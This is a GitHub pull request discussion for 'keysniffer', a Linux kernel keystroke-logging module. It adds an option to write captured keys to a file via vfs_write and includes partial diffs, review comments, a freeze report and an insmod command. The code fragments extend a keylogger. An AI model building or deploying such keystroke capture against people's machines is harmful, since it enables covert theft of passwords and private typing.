### PR TITLE
Save output to other file in the VFS

### PR DESCRIPTION
**Pull request by cedriczirtacic**
Added parameter output_path to the module so you can save the output of keys pressed on another specified file in the filesystem.

### CODE REVIEW

**Comment by jarun** [comment]
Please run the patch against [checkpatch](http://tuxdiary.com/2015/03/22/check-kernel-code-checkpatch/) and fix the issues.

File: keysniffer.c [hunk 1]
```diff
@@ -170,7 +180,19 @@ int keysniffer_cb(struct notifier_block *nblock,
 	strncpy(keys_buf + buf_pos, keybuf, len);
 	buf_pos += len;
 	keys_buf[buf_pos++] = '\n';
-	pr_debug("%s\n", keybuf);
+	if (output == NULL) {
+		pr_debug("%s\n", keybuf);
+	} else{
```
Comment (jarun) [inline keysniffer.c]: should be

`} else {`

**Review by jarun — CHANGES_REQUESTED** [review]

**Comment by jarun** [comment]
Also, please document it under the **Usage** section in README. What use would it be do you think if only you and me know about it? :)

**Comment by cedriczirtacic** [comment]
You're right, jarun. Gonna take a moment and modify the README.md
Thanks!

**Comment by jarun** [comment]
Thank you!

**Comment by jarun** [comment]
BTW, I know people looking for this feature. It adds good value. :+1:

**Comment by cedriczirtacic** [comment]
Thanks, jarun! I was also looking for something like that so I decided to help.

**Comment by jarun** [comment]
Thank you for your contribution!

File: keysniffer.c [hunk 2]
```diff
@@ -170,7 +180,19 @@ int keysniffer_cb(struct notifier_block *nblock,
...
 	buf_pos += len;
 	keys_buf[buf_pos++] = '\n';
-	pr_debug("%s\n", keybuf);
+	if (output == NULL) {
+		pr_debug("%s\n", keybuf);
+	} else {
+		mm_segment_t oldfs;
+		oldfs = get_fs();
+		set_fs(KERNEL_DS);
+		loff_t off = 0;
```
Comment (jarun) [inline keysniffer.c:189]: There's a warning in this line:

```
/home/vaio/GitHub/keysniffer/keysniffer.c:189:3: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]
   loff_t off = 0;
```

Please fix it.

Comment (jarun) [reply keysniffer.c:189]: Leave it. I'll take care of it. Need to make another change anyway.

**Comment by jarun** [comment]
**Regression:**

On my system as soon as I run:

`sudo insmod kisni.ko output_path=/home/user/keys`

the system freezes.

**Comment by jarun** [comment]
I think the code is by the book and still it's failing. I am noticing in multiple places that writing from vfs is a bad idea. Reverting this.

**Comment by cedriczirtacic** [comment]
Did you deleted line 189? In that case the module will crash with vfs_write().

**Comment by cedriczirtacic** [comment]
Yeah, is not recommended but is one of the few easy ways of writing physical data to disk from kernel space.

**Comment by jarun** [comment]
> Did you deleted line 189? In that case the module will crash with vfs_write().

Not at all! I tried the changes and bam! I did some debugging but couldn't figure out the root cause other than the fact that the vfs_write() itself goes gaga...

I am expecting more people would face this as well.

Just for reference, it's still possible to read/copy the debugfs file during shutdown:
https://opensource.com/life/16/11/running-commands-shutdown-linux
a little roundabout, but safe.

**Comment by cedriczirtacic** [comment]
Yes, I know is possible to manipulate the content from the debugfs file and copy the content to an actual file inside a vfs but I wanted to do it directly.

I'm using a Debian using kernel 4.0.6 amd64 and it works. Will keep testing and playing 👍 
Thanks!

**Comment by jarun** [comment]
Ubuntu 16.04 with all upgrades here (use [Voyager](https://voyagerlive.org/))

```
$ uname -a
Linux tux 4.4.0-72-generic #93-Ubuntu SMP Fri Mar 31 14:07:41 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
```

**Pull request merged**